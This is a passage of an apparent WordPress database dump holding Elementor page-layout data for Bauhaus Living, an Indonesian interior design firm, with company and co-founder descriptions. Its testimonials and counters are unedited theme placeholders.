"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"\\\"Let\'s turn your ideas into reality\\\"\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3878,4872,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3879,4872,'_elementor_pro_version','3.8.1'),(3880,4872,'_elementor_css','a:6:{s:4:\"time\";i:1695372643;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3881,4873,'_wp_page_template','elementor_header_footer'),(3882,4873,'_elementor_edit_mode','builder'),(3883,4873,'_elementor_template_type','wp-page'),(3884,4873,'_elementor_version','3.8.1'),(3885,4873,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian 